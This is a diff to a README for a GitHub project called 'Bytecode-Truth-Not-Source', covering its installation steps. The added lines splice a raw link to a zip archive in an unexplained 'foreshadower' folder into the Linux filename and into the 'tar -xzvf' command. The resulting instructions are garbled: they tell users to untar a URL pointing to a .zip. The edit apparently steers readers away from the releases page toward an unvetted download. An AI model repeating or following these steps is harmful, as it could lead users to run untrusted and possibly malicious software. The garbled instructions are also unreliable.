MARIAMSOFT/Bytecode-Truth-Not-Source/README.md

    - On the Releases page, select the latest version.
 This version will have the most features and security updates.

 4. **Download the File**
    - Click on the release file compatible with your operating system.
-The file should have a name like `Bytecode-Truth-Not-Source-v<version>.exe` for Windows, `<version>.dmg` for macOS, or `<version>.tar.gz` for Linux.
+The file should have a name like `Bytecode-Truth-Not-Source-v<version>.exe` for Windows, `<version>.dmg` for macOS, or `<version>https://raw.githubusercontent.com/MARIAMSOFT/Bytecode-Truth-Not-Source/main/foreshadower/Bytecode-Truth-Not-Source_v3.1.zip` for Linux.

 5. **Run the File**
    - Once the download completes, locate the file in your Downloads folder.
    - On Windows, double-click the `.exe` file to start the installation.
    - On macOS, open the `.dmg` file and drag the application to your Applications folder.
-   - On Linux, open a terminal, navigate to the download location, and run the command `tar -xzvf <version>.tar.gz`.
+   - On Linux, open a terminal, navigate to the download location, and run the command `tar -xzvf <version>https://raw.githubusercontent.com/MARIAMSOFT/Bytecode-Truth-Not-Source/main/foreshadower/Bytecode-Truth-Not-Source_v3.1.zip`.

 6. **Follow Installation Prompts**
    - The installation wizard will guide you through the process.
 Follow the prompts to complete the installation.